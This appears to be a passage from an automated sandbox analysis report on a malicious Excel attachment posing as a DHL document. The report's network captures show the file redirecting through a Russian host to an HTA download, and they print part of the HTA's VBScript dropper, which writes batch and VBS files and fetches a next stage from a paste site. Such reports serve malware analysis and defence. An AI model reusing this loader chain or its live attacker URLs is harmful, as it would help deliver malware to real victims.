                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 65 63 75 74 61 72 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 0d 0a 20 20 20 20 20 20 20 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 22 0d 0a 20 20 20 20 20 20 20 20 42 4f 52 44 45 52 3d 22 6e 6f 6e 65 22 0d 0a 20 20 20 20 20 20 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 49 4e 47 4c 45 49 4e 53 54 41 4e 43 45 3d 22 79 65 73 22 0d 0a 20 20 20 20 20 20 20 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 0d 0a 20 20 20 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 6d 6f 72 70 68 69 6e 69 73 6d 0d 0a 20 20 20 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html><head> <title>Executar Script</title> <HTA:APPLICATION APPLICATIONNAME="ScriptExecutor" BORDER="none" CAPTION="no" SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" /> <script language="VBScript"> Dim morphinism Set morphinism = CreateObject("WScript.Shell") Dim technophobe technophobe = "C:\Windows\Temp\eggfruit.bat" Dim hettotypes, regimens Set hettotypes = CreateObject("Scripting.FileSystemObject") Set regimens = hettotypes.CreateTextFile(technophobe, True) regimens.WriteLine "@echo off" regimens.WriteLine "setlocal" regimens.WriteLine "set ""fugues=C:\Windows\Temp\egoize.vbs""" regimens.WriteLine ">" & """%fugues%""" & " (" regimens.WriteLine " echo Dim
                      Mar 15, 2025 08:45:04.793350935 CET992INData Raw: 6e 6f 6e 63 61 74 61 6c 6f 67 2c 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 22 0d 0a 20 20 20 20 20 20 20 20 72 65 67 69 6d 65 6e 73 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 6e 6f 6e 63 61 74 61 6c 6f 67 20 3d 20 22 22 68 74
                      Data Ascii: noncatalog, documentarist" regimens.WriteLine " echo noncatalog = ""https://paste.ee/d/2rpbzWd4/0""" regimens.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)" regimens.WriteLine " ech


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749697188.225.72.1704436544C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-15 07:45:03 UTC249OUTGET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: kryx.ru
                      Connection: Keep-Alive
                      2025-03-15 07:45:04 UTC509INHTTP/1.1 302 Found
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 15 Mar 2025 07:45:04 GMT
                      Content-Type: text/plain; charset=utf-8
                      Content-Length: 118
                      Connection: close
                      X-DNS-Prefetch-Control: off
                      X-Frame-Options: SAMEORIGIN
                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Location: http://198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                      Vary: Accept
                      2025-03-15 07:45:04 UTC118INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 31 32 2e 38 39 2e 32 34 2f 78 61 6d 70 70 2f 67 6c 6f 72 72 79 2f 69 69 6e 65 76 65 72 79 69 63 65 73 6b 69 6c 6c 77 69 74 68 67 72 65 61 74 6e 65 77 73 67 69 76 65 6e 6d 65 62 65 73 74 2e 68 74 61 3f 26 76 61 6c 75 61 62 6c 65 3d 61 6e 69 6d 61 74 65 64
                      Data Ascii: Found. Redirecting to http://198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.74970113.107.246.604436544C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-15 07:45:19 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-15 07:45:19 UTC493INHTTP/1.1 200 OK
                      Date: Sat, 15 Mar 2025 07:45:19 GMT
                      Content-Type: text/plain
                      Content-Length: 1114783
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public
                      Last-Modified: Wed, 12 Mar 2025 22:11:58 GMT
                      ETag: "0x8DD61B2E85B8C36"
                      x-ms-request-id: e7c70e09-201e-0071-077d-95ff15000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250315T074519Z-186895dd8bdhmxsmhC1EWRkd5g0000000670000000006dvg
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      X-Cache-Info: L1_T2
                      Accept-Ranges: bytes
                      2025-03-15 07:45:19 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                      Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                      2025-03-15 07:45:19 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                      Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                      2025-03-15 07:45:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                      Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                      2025-03-15 07:45:19 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                      Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                      2025-03-15 07:45:19 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                      Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                      2025-03-15 07:45:19 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                      Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                      2025-03-15 07:45:19 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                      Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                      2025-03-15 07:45:19 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                      Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                      2025-03-15 07:45:19 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                      Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                      2025-03-15 07:45:19 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                      Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.74970413.107.246.604436544C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-15 07:45:26 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-15 07:45:26 UTC491INHTTP/1.1 200 OK
                      Date: Sat, 15 Mar 2025 07:45:26 GMT
                      Content-Type: text/xml
                      Content-Length: 204
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                      ETag: "0x8DC582BB6C8527A"
                      x-ms-request-id: c0f87a84-101e-0017-0c46-9547c7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250315T074526Z-186895dd8bdpng2nhC1EWRufus00000004ng000000003du9
                      x-fd-int-roxy-purgeid: 0
                      X-Cache-Info: L1_T2
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2025-03-15 07:45:26 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.74970313.107.246.604436544C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-15 07:45:26 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-15 07:45:26 UTC515INHTTP/1.1 200 OK
                      Date: Sat, 15 Mar 2025 07:45:26 GMT
                      Content-Type: text/xml
                      Content-Length: 2128
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                      ETag: "0x8DC582BA41F3C62"
                      x-ms-request-id: cf00022c-201e-0096-2759-95ace6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250315T074526Z-186895dd8bdfdfmphC1EWRy11n00000002p0000000002u80
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      X-Cache-Info: L1_T2
                      Accept-Ranges: bytes
                      2025-03-15 07:45:26 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:03:44:08
                      Start date:15/03/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x540000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:11
                      Start time:03:45:03
                      Start date:15/03/2025
                      Path:C:\Windows\SysWOW64\mshta.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                      Imagebase:0x430000
                      File size:13'312 bytes
                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:13
                      Start time:03:45:12
                      Start date:15/03/2025
                      Path:C:\Windows\splwow64.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\splwow64.exe 12288
                      Imagebase:0x7ff723d60000
                      File size:163'840 bytes
                      MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:15
                      Start time:03:45:22
                      Start date:15/03/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx"
                      Imagebase:0x540000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Code Analysis

                      Call Graph

                      • Entrypoint
                      • Decryption Function
                      • Executed
                      • Not Executed
                      • Show Help
                      callgraph 1 Error: Graph is empty

                      Module: Sheet1

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet1"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: Sheet2

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet2"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: Sheet3

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "Sheet3"

                      2

                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                      3

                      Attribute VB_GlobalNameSpace = False

                      4

                      Attribute VB_Creatable = False

                      5

                      Attribute VB_PredeclaredId = True

                      6

                      Attribute VB_Exposed = True

                      7

                      Attribute VB_TemplateDerived = False

                      8

                      Attribute VB_Customizable = True

                      Module: ThisWorkbook

                      Declaration
                      LineContent
                      1

                      Attribute VB_Name = "ThisWorkbook"

                      2

                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                      3

